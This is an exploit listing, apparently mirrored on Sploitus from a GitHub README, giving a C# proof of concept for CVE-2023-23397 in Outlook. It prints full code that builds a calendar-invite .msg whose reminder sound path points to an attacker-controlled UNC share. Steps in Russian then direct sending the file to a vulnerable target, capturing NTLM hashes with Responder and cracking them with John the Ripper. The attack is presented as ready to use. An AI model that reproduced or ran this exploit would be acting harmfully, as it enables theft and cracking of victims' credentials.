Sploitus

Exploit for CVE-2023-23397

kitploit · 2026-08-25

Exploit Code

MARKDOWN61 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MONEERTV-CVE-2023-23397
# CVE-2023-23397

CVE-2023-23397 C# PoC 1- скачайте msgkit 2- отредактируйте класс Appointment и добавьте следующее: ![image](https://assets.kitploit.com/production/public/readmes/29466/5cfe33bffc67b2dfee1b79c943953b0745b72fdaeb51e2e4e2377636aa068aea.png)

3- создайте новый класс внутри проекта, чтобы задать свойства MSG-файла:

root@kitploit:~
    
    
    using MsgKit.Enums;
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;
    using System.Threading.Tasks;
    
    namespace MsgKit
    {
        class Program
        {
            static void Main(string[] args)
            {
                using (var appointment = new Appointment(
                new Sender("some-email@example.com", "moneertv"),
                new Representing("some-email@example.com", "moneertv"),
                "CVE-2023-23397"))
                {
                    appointment.Recipients.AddTo("some-email@example.com", "muneer aqraa");
                    appointment.Subject = "CVE-2023-23397";
                    appointment.Location = "Neverland";
                    appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
                    appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
                    appointment.AllDay = true;
                    appointment.BodyText = "CVE-2023-23397";
                    appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
                    appointment.SentOn = DateTime.UtcNow;
                    appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
                    appointment.IconIndex = MessageIconIndex.UnsentMail;
    
                    appointment.PidLidReminderFileParameter = @"\\192.168.1.222\";
                    appointment.PidLidReminderOverride = true;
    
                    appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");
    
                }
    
            }
        }
    }
    

4- измените свойства проекта, указав тип вывода «Консольное приложение»: ![image](https://assets.kitploit.com/production/public/readmes/29466/216c622ca679a269d3380dc5398071cd027c248c54f43d0b6336e12ee320586d.png)

5- запустите проект, чтобы сгенерировать dirty.msg

6- отправьте сообщение уязвимой цели и дождитесь, пока активируется напоминание о встрече.

6-2- пока ждёте, на машине Kali, IP которой вы указали в главном классе, выполните следующую команду, чтобы продолжать прослушивать тех, кто попадётся на приманку: # responder -I eth0 -v

7- когда вы получите хеши, сохраните их в файл и запустите John the Ripper по этим хешам, используя словарь (например, rockyou)